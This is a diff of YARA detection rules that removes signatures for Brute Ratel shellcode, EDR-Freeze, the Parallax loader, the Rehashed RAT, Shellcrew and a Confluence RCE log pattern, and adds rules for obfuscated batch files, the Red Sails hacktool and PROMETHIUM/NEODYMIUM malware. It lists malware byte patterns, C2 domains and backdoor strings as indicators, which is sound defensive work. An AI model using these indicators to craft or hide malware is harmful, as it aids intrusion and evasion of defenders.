-		hash2 = "36a17919a97732f1ddc31b421c6ebb0c535924f895d7caaff04a5da908c42f76"
-		hash3 = "394b768bfd3506a9ee6b7bbe6f87c40fb23c28f7919a2a9eb333b27db635eafe"
-		hash4 = "a8ec07f006a9068ce5f068b3bb61b0649481b6b26203b8eb4308c53ff1d1bf8d"
-		hash5 = "d485017fb20c5a8fe38a6dbf896d4cbce485ff53a6cfe0e1440a1818b2d303ee"
-		hash6 = "d989ebd417e6fae60a544e43bfc0ee63f5d9352ce0059b95ed4e7e18efbc5d0b"
-		hash7 = "e2b2dd0984e52112965392471f6a09020eb8380aa53d48d2fb4dd3aaa7edae9b"
 
 	strings:
-		$x1 = "EDR-Freeze.exe <TargetPID> <SleepTime>" wide fullword
-		$x2 = "Successfully created PPL process with PID:" wide fullword
-		$x3 = "\\EDR-Freeze.pdb" ascii
-		$sa1 = "C:\\Windows\\System32\\WerFaultSecure.exe" wide fullword
-		$sa2 = "Failed to create dump files: " wide fullword
-		$sb1 = " /encfile" wide fullword
-		$sb2 = " /pid" wide fullword
-		$sb3 = " /tid" wide fullword
-		$sb4 = " /cancel" wide fullword
+		$s1 = "&&set "
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( 1 of ( $x* ) or all of ( $sa* ) or all of ( $sb* ) ) or 6 of them
+		filesize < 300KB and uint32( 0 ) == 0x20746573 and $s1 in ( 0 .. 32 )
 }
-
-rule SIGNATURE_BASE_Brc4_Shellcode
+rule SIGNATURE_BASE_SUSP_BAT_OBFUSC_Jul24_2 : FILE
 {
 	meta:
-		description = "Hunts for shellcode opcode used in Badger x86/x64 till release v1.2.9"
-		author = "@ninjaparanoid"
-		id = "7e899d2f-332b-53f7-b9e6-cfde2bce6223"
-		date = "2022-11-19"
-		modified = "2023-12-05"
-		reference = "https://github.com/paranoidninja/Brute-Ratel-C4-Community-Kit/blob/main/deprecated/brc4.yara"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/hktl_bruteratel_c4.yar#L263-L290"
+		description = "Detects indicators of obfuscation in Windows Batch files"
+		author = "Florian Roth"
+		id = "999cd365-2862-5618-b0b6-ee45dea1e9cf"
+		date = "2024-07-12"
+		modified = "2024-12-12"
+		reference = "https://x.com/0xToxin/status/1811656147943752045"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/susp_bat_obfusc_jul24.yar#L18-L35"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "a2816eb0316cebc96569847c17eae3bc50b988b07aa471176a09695fcefc21ec"
-		score = 75
-		quality = 83
-		tags = ""
-		version = "last version"
-		arch_context = "x64"
+		logic_hash = "729ec93d180bf39c146c3fd847655340428abc3231b556ca51d3ca68825e7c3e"
+		score = 70
+		quality = 85
+		tags = "FILE"
 
 	strings:
-		$shellcode_x64_Start = { 55 50 53 51 52 56 57 41 50 41 51 41 52 41 53 41 54 41 55 41 56 41 57 }
-		$shellcode_x64_End = { 5B 5E 5F 41 5C 41 5D 41 5E 41 5F 5D C3 }
-		$shellcode_x64_StageEnd = { 5C 41 5F 41 5E 41 5D 41 5C 41 5B 41 5A 41 59 41 58 5F 5E 5A 59 5B 58 5D C3 }
-		$funcHash1 = { 5B BC 4A 6A }
-		$funcHash2 = { 5D 68 FA 3C }
-		$funcHash3 = { AA FC 0D 7C }
-		$funcHash4 = { 8E 4E 0E EC }
-		$funcHash5 = { B8 12 DA 00 }
-		$funcHash6 = { 07 C4 4C E5 }
-		$funcHash7 = { BD CA 3B D3 }
-		$funcHash8 = { 89 4D 39 8C }
-		$hashFuncx64 = { EB 20 0F 1F 44 00 00 44 0F B6 C8 4C 89 DA 41 83 E9 20 4D 63 C1 4B 8D 04 10 49 39 CB 74 21 49 83 C3 01 41 89 C2 }
-		$hashFuncx86 = { EB 07 8D 74 26 00 83 C2 01 0F B6 31 C1 C8 0D 89 F1 8D 5C 30 E0 01 F0 80 F9 61 89 D1 0F 43 C3 39 D7 75 E3 }
+		$s1 = "&&set "
 
 	condition:
-		(pe.machine == pe.MACHINE_AMD64 and ( 2 of ( $shellcode* ) or all of ( $funcHash* ) and $hashFuncx64 ) ) or ( pe.machine == pe.MACHINE_I386 and ( all of ( $funcHash* ) and $hashFuncx86 ) )
+		filesize < 300KB and #s1 > 30 and uint16( filesize -2 ) == 0x0a0d and uint8( filesize -3 ) == 0x25
 }
-rule SIGNATURE_BASE_Crime_Win32_Parallax_Loader_1 : FILE
+rule SIGNATURE_BASE_SUSP_BAT_OBFUSC_Jul24_3 : FILE
 {
 	meta:
-		description = "Detects Parallax Loader"
-		author = "@VK_Intel"
-		id = "5e030b68-3c29-5203-bb4e-f01850bfbbab"
-		date = "2020-02-24"
-		modified = "2023-12-05"
-		reference = "https://twitter.com/VK_Intel/status/1227976106227224578"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_parallax_rat.yar#L2-L18"
+		description = "Detects indicators of obfuscation in Windows Batch files"
+		author = "Florian Roth"
+		id = "a484ed03-8588-55e7-9674-b1208e14eb3f"
+		date = "2024-07-12"
+		modified = "2024-12-12"
+		reference = "https://x.com/0xToxin/status/1811656147943752045"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/susp_bat_obfusc_jul24.yar#L37-L54"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "1331e7b69fd9b14b5d2dae45b452b385e48018290d91de33a4f4a5ebcce4805b"
-		score = 75
+		logic_hash = "ecbe7850349f0368620ff4294e5d0ca277983799eed510f8bf8abe4d4c192197"
+		score = 70
 		quality = 85
 		tags = "FILE"
-		hash1 = "829fce14ac8b9ad293076c16a1750502c6b303123c9bd0fb17c1772330577d65"
 
 	strings:
-		$main_call = { 68 81 85 50 00 e8 ?? ?? ?? ?? 89 ?? ?? ?? ?? ?? 8d ?? ?? ?? ?? ?? 51 ff ?? ?? ?? ?? ?? e8 ?? ?? ?? ?? 89 ?? ?? ?? ?? ?? ff ?? ?? ?? ?? ?? 68 00 10 00 00 68 b0 a2 00 00 ff ?? ?? ?? ?? ?? ff ?? ?? ?? ?? ?? 89 ?? ?? ?? ?? ?? ff ?? ?? ?? ?? ?? 68 8c e1 4f 00 ff ?? ?? ?? ?? ?? e8 ?? ?? ?? ?? 83 c4 0c 8b ?? ?? ?? ?? ?? 8b ?? ?? ?? ?? ?? 8b ?? ?? ?? ?? ?? 89 ?? ?? 8b ?? ?? ?? ?? ?? 8b ?? ?? ?? ?? ?? 8b ?? ?? ?? ?? ?? 89 ?? ?? 8b ?? ?? ?? ?? ?? 8b ?? ?? ?? ?? ?? 8b ?? ?? ?? ?? ?? 89 ?? ?? 8b ?? ?? ?? ?? ?? 8b ?? ?? ?? ?? ?? 8b ?? ?? ?? ?? ?? 89 ?? ?? 8b ?? ?? ?? ?? ?? 03 ?? ?? ?? ?? ?? 89 ?? ?? ?? ?? ?? 8b ?? ?? ?? ?? ?? 89 ?? ?? ?? ?? ?? ff ?? ?? ?? ?? ?? 68 40 84 50 00 8d ?? ?? ?? ?? ?? 51 e8 ?? ?? ?? ?? 83 c4 0c}
-		$decoder_call = { 55 8b ec 83 c4 f8 33 c0 89 ?? ?? 33 d2 89 ?? ?? 8b ?? ?? 3b ?? ?? 7d ?? 8b ?? ?? 8b ?? ?? 8b ?? ?? 8b ?? ?? 33 ?? ?? ?? ?? ?? ?? 8b ?? ?? 8b ?? ?? 89 ?? ?? 83 ?? ?? ?? 75 ?? 33 d2 89 ?? ?? eb ?? ff ?? ?? ff ?? ?? 8b ?? ?? 3b ?? ?? 7c ?? 59 59 5d c3}
+		$s1 = "% \\\\%"
+		$s2 = { 3D ?? 26 26 73 65 74 20 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 2000KB and 2 of them
+		filesize < 300KB and all of them
 }
-rule SIGNATURE_BASE_Crime_Win32_Parallax_Payload_1 : FILE
+rule SIGNATURE_BASE_Redsails_EXE : FILE
 {
 	meta:
-		description = "Detects Parallax Injected Payload v1.01"
-		author = "@VK_Intel"
-		id = "f3a23a28-e322-59ff-85e0-72e44def5c02"
-		date = "2020-02-24"
+		description = "Detects Red Sails Hacktool by WinDivert references"
+		author = "Florian Roth (Nextron Systems)"
+		id = "e7ebbebf-e2d6-5cd3-b859-b804d39d1641"
+		date = "2017-10-02"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/VK_Intel/status/1227976106227224578"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_parallax_rat.yar#L20-L38"
+		reference = "https://github.com/BeetleChunks/redsails"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_redsails.yar#L11-L25"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "3a1718d7caea5bd6741dd39fc16f955e1d3c73a282d51eda5b63c3352404529e"
+		logic_hash = "fe9232989fb29686f11ee8cd59090fb6602301b00ff12d4a0dff8279a1718086"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "20d0be64a0e0c2e96729143d41b334603f5d3af3838a458b0627af390ae33fbc"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "7a7861d25b0c038d77838ecbd5ea5674650ad4f5faf7432a6f3cfeb427433fac"
 
 	strings:
-		$zwdelay_prologue = { 66 ?? ?? ?? 66 83 c1 01 66 ?? ?? ?? 50 b8 cb cb cb cb 89 ?? ?? ?? ?? ?? 58 8b ?? ?? ?? ?? ?? 89 ?? ?? 68 88 13 00 00 8b ?? ?? 8b ?? ?? 51 e8 ?? ?? ?? ??}
-		$wininet_call = { b8 77 00 00 00 66 ?? ?? ?? b9 69 00 00 00 66 ?? ?? ?? ba 6e 00 00 00 66 ?? ?? ?? b8 69 00 00 00 66 ?? ?? ?? b9 6e 00 00 00 66 ?? ?? ?? ba 65 00 00 00 66 ?? ?? ?? b8 74 00 00 00 66 ?? ?? ?? 33 c9 66 ?? ?? ?? 8d ?? ?? 52 8b ?? ?? 8b ?? ?? ff d1 89 ?? ?? 6a 00 68 0c fc e5 f2 8b ?? ?? 52 e8 ?? ?? ?? ?? 83 c4 0c 89 ?? ?? 6a 00 68 3d a8 16 da 8b ?? ?? 50 e8 ?? ?? ?? ?? 83 c4 0c 89 ?? ?? 6a 00 68 e0 05 65 01 8b ?? ?? 51 e8 ?? ?? ?? ?? 83 c4 0c 89 ?? ?? 6a 00 68 f5 98 c0 6c 8b ?? ?? 52 e8 ?? ?? ?? ?? 83 c4 0c 89 ?? ?? 6a 00 68 24 1d 19 e5 8b ?? ?? 50 e8 ?? ?? ?? ?? 83 c4 0c 89 ?? ?? 6a 00 68 a8 ed f2 ce 8b ?? ?? 8b ?? ?? 52 e8 ?? ?? ?? ?? 83 c4 0c 89 ?? ?? 6a 00 6a 00 ff ?? ?? 85 c0 75 ?? 68 88 13 00 00 ff ?? ?? eb ?? 6a 00 68 00 01 00 04 6a }
-		$rand_png_call = { b8 25 00 00 00 66 ?? ?? ?? ?? ?? ?? b9 78 00 00 00 66 ?? ?? ?? ?? ?? ?? ba 2e 00 00 00 66 ?? ?? ?? ?? ?? ?? b8 70 00 00 00 66 ?? ?? ?? ?? ?? ?? b9 6e 00 00 00 66 ?? ?? ?? ?? ?? ?? ba 67 00 00 00 66 ?? ?? ?? ?? ?? ?? 33 c0 66 ?? ?? ?? ?? ?? ?? 6a 64 6a 40 8b ?? ?? 8b ?? ?? ff d2 89 ?? ?? 8b ?? ?? 50 68 00 e1 f5 05 68 10 27 00 00 e8 ?? ?? ?? ??}
+		$s1 = "bWinDivert64.dll" fullword ascii
+		$s2 = "bWinDivert32.dll" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and 2 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 6000KB and all of them )
 }
-rule SIGNATURE_BASE_LOG_EXPL_Confluence_RCE_CVE_2021_26084_Sep21 : LOG CVE_2021_26084
+rule SIGNATURE_BASE_Redsails_PY
 {
 	meta:
-		description = "Detects exploitation attempts against Confluence servers abusing a RCE reported as CVE-2021-26084"
+		description = "Detects Red Sails Hacktool - Python"
 		author = "Florian Roth (Nextron Systems)"
-		id = "bbf98ce4-d32b-541a-b727-bc35c9aaef53"
-		date = "2021-09-01"
+		id = "59d5e784-70ff-5061-9867-54c905ecfd8c"
+		date = "2017-10-02"
 		modified = "2023-12-05"
-		reference = "https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_cve_2021_26084_confluence_log.yar#L2-L24"
+		reference = "https://github.com/BeetleChunks/redsails"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_redsails.yar#L27-L45"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "04542570b4814efde3d96ba5be8b5f9fd6e3c51be09f0e8a1c4eba45bfd8f5ff"
-		score = 55
-		quality = 60
-		tags = "LOG, CVE-2021-26084"
+		logic_hash = "4c5426a427e2c25cf9e44ae5f9ec477c9ab11f611d9a0db444c36e7cae176562"
+		score = 75
+		quality = 85
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "6ebedff41992b9536fe9b1b704a29c8c1d1550b00e14055e3c6376f75e462661"
+		hash2 = "5ec20cb99030f48ba512cbc7998b943bebe49396b20cf578c26debbf14176e5e"
 
 	strings:
-		$xr1 = /isSafeExpression Unsafe clause found in \['[^\n]{1,64}\\u0027/ ascii wide
-		$xs1 = "[util.velocity.debug.DebugReferenceInsertionEventHandler] referenceInsert resolving reference [$!queryString]"
-		$xs2 = "userName: anonymous | action: createpage-entervariables ognl.ExpressionSyntaxException: Malformed OGNL expression: '\\' [ognl.TokenMgrError: Lexical error at line 1"
-		$sa1 = "GET /pages/doenterpagevariables.action"
-		$sb1 = "%5c%75%30%30%32%37"
-		$sb2 = "\\u0027"
-		$sc1 = " ERROR "
-		$sc2 = " | userName: anonymous | action: createpage-entervariables"
-		$re1 = /\[confluence\.plugins\.synchrony\.SynchronyContextProvider\] getContextMap (\n )?-- url: \/pages\/createpage-entervariables\.action/
+		$x1 = "Gained command shell on host" fullword ascii
+		$x2 = "[!] Received an ERROR in shell()" fullword ascii
+		$x3 = "Target IP address with backdoor installed" fullword ascii
+		$x4 = "Open backdoor port on target machine" fullword ascii
+		$x5 = "Backdoor port to open on victim machine" fullword ascii
 
 	condition:
-		1 of ( $x* ) or ( $sa1 and 1 of ( $sb* ) ) or ( all of ( $sc* ) and $re1 )
+		1 of them
 }
-
-rule SIGNATURE_BASE_Rehashed_RAT_1 : FILE
+rule SIGNATURE_BASE_PROMETHIUM_NEODYMIUM_Malware_1 : FILE
 {
 	meta:
-		description = "Detects malware from Rehashed RAT incident"
+		description = "Detects PROMETHIUM and NEODYMIUM malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "24536421-3f8f-58f3-8245-06c519d7a21a"
-		date = "2017-09-08"
+		id = "21e858b1-2cfa-5757-96f0-7c44a5da6898"
+		date = "2016-12-14"
 		modified = "2023-12-05"
-		reference = "https://blog.fortinet.com/2017/09/05/rehashed-rat-used-in-apt-campaign-against-vietnamese-organizations"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_rehashed_rat.yar#L13-L39"
+		reference = "https://goo.gl/8abDE6"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_promethium_neodymium.yar#L10-L27"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "06a98e87d931bdea697a2cf3de604f03654f9aa2b3f2346e78ba92e492c0fc7c"
+		logic_hash = "143e52eedc5c3be9bbf0f916b232de26e4ed5c7e81e3f77cae70e6af84d31de1"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "37bd97779e854ea2fc43486ddb831a5acfd19cf89f06823c9fd3b20134cb1c35"
+		hash1 = "e12031da58c0b08e8b610c3786ca2b66fcfea8ddc9ac558d08a29fd27e95a3e7"
 
 	strings:
-		$x1 = "C:\\Users\\hoogle168\\Desktop\\"
-		$x2 = "\\NewCoreCtrl08\\Release\\NewCoreCtrl08.pdb" ascii
-		$s1 = "User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729" ascii
-		$s2 = "NewCoreCtrl08.dll" fullword ascii
-		$s3 = "GET /%s%s%s%s HTTP/1.1" fullword ascii
-		$s4 = "http://%s:%d/%s%s%s%s" fullword ascii
-		$s5 = "MyTmpFile.Dat" fullword wide
-		$s6 = "root\\%s" fullword wide
+		$s1 = "c:\\Windows\\system32\\syswindxr32.dll" fullword wide
+		$s2 = "c:\\windows\\temp\\TrueCrypt-Setup-7.1a-tamindir.exe" fullword wide
+		$s3 = "%s\\ssleay32.dll" fullword wide
+		$s4 = "%s\\libeay32.dll" fullword wide
+		$s5 = "%s\\fprot32.exe" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 800KB and ( pe.imphash ( ) == "893212784d01f11aed9ebb42ad2561fc" or pe.exports ( "ProcessTrans" ) or ( 1 of ( $x* ) or 4 of them ) ) ) or ( all of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 10000KB and 3 of them ) or ( all of them )
 }
-
-rule SIGNATURE_BASE_Rehashed_RAT_2 : FILE
+rule SIGNATURE_BASE_PROMETHIUM_NEODYMIUM_Malware_2 : FILE
 {
 	meta:
-		description = "Detects malware from Rehashed RAT incident"
+		description = "Detects PROMETHIUM and NEODYMIUM malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "fcf82155-10da-56b7-879b-841c4ae5023b"
-		date = "2017-09-08"
+		id = "5858541b-c394-5be8-9db3-fcff66f635de"
+		date = "2016-12-14"
 		modified = "2023-12-05"
-		reference = "https://blog.fortinet.com/2017/09/05/rehashed-rat-used-in-apt-campaign-against-vietnamese-organizations"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_rehashed_rat.yar#L41-L67"
+		reference = "https://goo.gl/8abDE6"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_promethium_neodymium.yar#L29-L45"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "96c4582981792eb5f8180c06a5fe824fd439cfa0ede294eccff3afa7d318a6e9"
+		logic_hash = "2d97ee2698b6a09da7f8c6850583ec7493cc288368b98b20790dd8305521f894"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "49efab1dedc6fffe5a8f980688a5ebefce1be3d0d180d5dd035f02ce396c9966"
+		hash1 = "1aef507c385a234e8b10db12852ad1bd66a04730451547b2dcb26f7fae16e01f"
 
 	strings:
-		$x1 = "dalat.dulichovietnam.net" fullword ascii
-		$x2 = "web.Thoitietvietnam.org" fullword ascii
-		$a1 = "User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64)" fullword ascii
-		$a2 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3" ascii
-		$s1 = "GET /%s%s%s%s HTTP/1.1" fullword ascii
-		$s2 = "http://%s:%d/%s%s%s%s" fullword ascii
-		$s3 = "{521338B8-3378-58F7-AFB9-E7D35E683BF8}" fullword ascii
+		$s1 = "winasys32.exe" fullword ascii
+		$s2 = "alg32.exe" fullword ascii
+		$s3 = "wmsrv32.exe" fullword ascii
+		$s4 = "vmnat32.exe" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 300KB and ( pe.imphash ( ) == "9c4c648f4a758cbbfe28c8850d82f931" or ( 1 of ( $x* ) or 3 of them ) ) ) or ( 4 of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and 1 of them ) or ( 3 of them )
 }
-rule SIGNATURE_BASE_Rehashed_RAT_3 : FILE
+rule SIGNATURE_BASE_PROMETHIUM_NEODYMIUM_Malware_3 : FILE
 {
 	meta:
-		description = "Detects malware from Rehashed RAT incident"
+		description = "Detects PROMETHIUM and NEODYMIUM malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "59871be1-295f-54ee-ab4d-4f9e5fdc2935"
-		date = "2017-09-08"
-		modified = "2022-12-21"
-		reference = "https://blog.fortinet.com/2017/09/05/rehashed-rat-used-in-apt-campaign-against-vietnamese-organizations"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_rehashed_rat.yar#L69-L85"
+		id = "bff79813-0d72-50d9-9676-794801edc34b"
+		date = "2016-12-14"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/8abDE6"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_promethium_neodymium.yar#L47-L63"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "46f21f11959f863c85a1cfac74a28ba86d5b9789fea5a428168d157c13cce022"
+		logic_hash = "47595e07b59744f520cd9025bcec267384329b7687fd25842f5f7a8f4b360674"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "9cebae97a067cd7c2be50d7fd8afe5e9cf935c11914a1ab5ff59e91c1e7e5fc4"
+		hash1 = "2f98ac11c78ad1b4c5c5c10a88857baf7af43acb9162e8077709db9d563bcf02"
 
 	strings:
-		$x1 = "\\BisonNewHNStubDll\\Release\\Goopdate.pdb" ascii
-		$s2 = "psisrndrx.ebd" fullword wide
-		$s3 = "pbad exception" fullword ascii
+		$s1 = "%s SslHandshakeDone(%d) %d. Secure connection with %s, cipher %s, %d secret bits (%d total), session reused=%s" fullword ascii
+		$s2 = "mvhost32.dll" fullword ascii
+		$s3 = "sdwin32.dll" fullword ascii
+		$s4 = "ofx64.dll" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and ( 1 of ( $x* ) or 2 of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and 2 of them ) or ( all of them )
 }
-rule SIGNATURE_BASE_Streamex_Shellcrew
+rule SIGNATURE_BASE_PROMETHIUM_NEODYMIUM_Malware_4 : FILE
 {
 	meta:
-		description = "Detects a "
-		author = "Cylance"
-		id = "217077bb-71b7-5cbf-8adf-68a16688c415"
-		date = "2017-02-09"
+		description = "Detects PROMETHIUM and NEODYMIUM malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "4e926b1c-bf10-5337-8c3a-964008a37d8b"
+		date = "2016-12-14"
 		modified = "2023-12-05"
-		reference = "https://blog.cylance.com/shell-crew-variants-continue-to-fly-under-big-avs-radar"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_shellcrew_streamex.yar#L11-L29"
+		reference = "https://goo.gl/8abDE6"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_promethium_neodymium.yar#L65-L85"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "a82ff51c1dcd1ebe3d7acc96b46b0b79dcead9146204f060f5413c4c7b5286d3"
-		score = 80
+		logic_hash = "0e8bb00133a94b29c482b9785048025a62e2706f3653c1915be7b702fbfe48d6"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "15ededb19ec5ab6f03db1106d2ccdeeacacdb8cd708518d065cacb1b0d7e955d"
 
 	strings:
-		$a = "0r+8DQY97XGB5iZ4Vf3KsEt61HLoTOuIqJPp2AlncRCgSxUWyebhMdmzvFjNwka="
-		$b = {34 ?? 88 04 11 48 63 C3 48 FF C1 48 3D D8 03 00 00}
-		$bb = {81 86 ?? ?? 00 10 34 ?? 88 86 ?? ?? 00 10 46 81 FE D8 03 00 00}
-		$c = "greendll"
-		$d = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36" wide
-		$f = {26 5E 25 24 23 91 91 91 91}
-		$g = "D:\\pdb\\ht_d6.pdb"
+		$s1 = "c:\\windows\\temp\\winrar.exe" fullword wide
+		$s2 = "info@aadobetech.com" fullword ascii
+		$s3 = "%s\\ssleay32.dll" fullword wide
+		$s4 = "%s\\libeay32.dll" fullword wide
+		$s5 = "%s\\fprot32.exe" fullword wide
+		$s6 = "ADOBE Corp.1" fullword ascii
+		$s7 = "Adobe Flash Player1\"0 " fullword ascii
+		$s8 = "Windows Index Services" fullword wide
 
 	condition:
-		$a or $b or $bb or ( $c and $d ) or $f or $g
+		( uint16( 0 ) == 0x5a4d and filesize < 700KB and 4 of them ) or ( 6 of them )
 }
-rule SIGNATURE_BASE_Shellcrew_Streamex_1 : FILE
+rule SIGNATURE_BASE_PROMETHIUM_NEODYMIUM_Malware_5 : FILE
 {
 	meta:
-		description = "Auto-generated rule"
+		description = "Detects PROMETHIUM and NEODYMIUM malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "26b4cac0-3f2b-5637-86f5-16b7f8afa0e6"
-		date = "2017-02-10"
-		modified = "2022-12-21"
-		reference = "https://blog.cylance.com/shell-crew-variants-continue-to-fly-under-big-avs-radar"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_shellcrew_streamex.yar#L40-L59"
+		id = "4bd60f61-a595-5289-9595-a7e33f265748"
+		date = "2016-12-14"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/8abDE6"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_promethium_neodymium.yar#L87-L105"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "4da0b8843de87e53243af40700afaab77120531af28dc311d9100bce6721650b"
+		logic_hash = "69433fae4d51f7fd7b6f5b683f9c751d0f0352b8ed805a8177085e635eb26260"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "81f411415aefa5ad7f7ed2365d9a18d0faf33738617afc19215b69c23f212c07"
+		hash1 = "a8b7e3edaa18c6127e98741503c3a2a66b7720d2abd967c94b8a5f2e99575ac5"
 
 	strings:
-		$x1 = "cmd.exe /c  \"%s\"" fullword wide
-		$s3 = "uac\\bin\\install_test.pdb" ascii
-		$s5 = "uncompress error:%d %s" fullword ascii
-		$s7 = "%s\\AdobeBak\\Proc.dat" fullword wide
-		$s8 = "e:\\workspace\\boar" fullword ascii
-		$s12 = "$\\data.ini" fullword wide
+		$s1 = "Winxsys.exe" fullword wide
+		$s2 = "%s\\ssleay32.dll" fullword wide
+		$s3 = "%s\\libeay32.dll" fullword wide
+		$s4 = "Windows Index Services" fullword wide
+		$s5 = "<F RAT" fullword ascii
+		$s6 = "WININDX-088FA840-B10D-11D3-BC36-006067709674" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and 4 of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 5000KB and 3 of them )
 }
-rule SIGNATURE_BASE_Shellcrew_Streamex_1_Msi : FILE
+rule SIGNATURE_BASE_PROMETHIUM_NEODYMIUM_Malware_6 : FILE
 {
 	meta:
-		description = "Auto-generated rule"
+		description = "Detects PROMETHIUM and NEODYMIUM malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "8cf5dad5-0737-56bf-8cef-7bcf7e7e5a78"
-		date = "2017-02-10"
+		id = "0f36eb56-39d8-536c-93ff-4a2352163612"
+		date = "2016-12-14"
 		modified = "2023-12-05"
-		reference = "https://blog.cylance.com/shell-crew-variants-continue-to-fly-under-big-avs-radar"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_shellcrew_streamex.yar#L61-L80"
+		reference = "https://goo.gl/8abDE6"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_promethium_neodymium.yar#L107-L125"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
